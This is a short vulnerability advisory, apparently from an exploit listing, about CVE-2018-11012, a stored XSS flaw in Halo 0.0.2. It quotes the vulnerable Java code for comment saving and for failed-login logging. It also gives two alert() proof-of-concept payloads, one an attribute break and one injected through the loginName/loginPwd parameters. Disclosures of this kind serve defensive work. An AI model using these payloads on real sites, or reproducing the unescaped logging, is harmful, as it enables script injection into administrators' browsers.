ruibaby Halo 0.0.2 CVE-2018-11012 Stored XSS

Authors:Insh3ll                  Risk:High

CVE:CVE-2018-11012              0day:XSS  

0day -id:0DAY-176169             Date:2018-05-13

Description

ruibaby Halo 0.0.2 has stored XSS via the loginName and loginPwd parameters in a failed login attempt to AdminController.java.

Vulnerability code

comment.setCommentAuthorEmail(comment.getCommentAuthorEmail().toLowerCase());
comment.setPost(post);
comment.setCommentDate(new Date());
comment.setCommentAuthorIp(HaloUtil.getIpAddr(request));
comment.setIsAdmin(0);
commentService.saveByComment(comment);

Payload

a" onclick="alert(/xss/)

Second place

When login failed at the background, the failed login username and password are written to the log without xss filtering, and displayed on the background home page, resulting in storage xss vulnerability.

Vulnerability code

AdminController.java

try {
            User aUser = userService.findUser();
            ...
        } catch (Exception e) {
            Integer errorCount = userService.updateUserLoginError();
            if (errorCount >= 5) {
                userService.updateUserLoginEnable("false");
            }
            userService.updateUserLoginLast(new Date());
            logsService.saveByLogs(new Logs(LogsRecord.LOGIN, LogsRecord.LOGIN_ERROR + "[" + loginName + "," + loginPwd + "]", HaloUtil.getIpAddr(request), new Date()));
            log.error("Login failed!:{0}", e.getMessage());
        }

Payload

loginName=admin&loginPwd=admin<a href="javascript:alert(/xss/);">xss</a>

Leave a Reply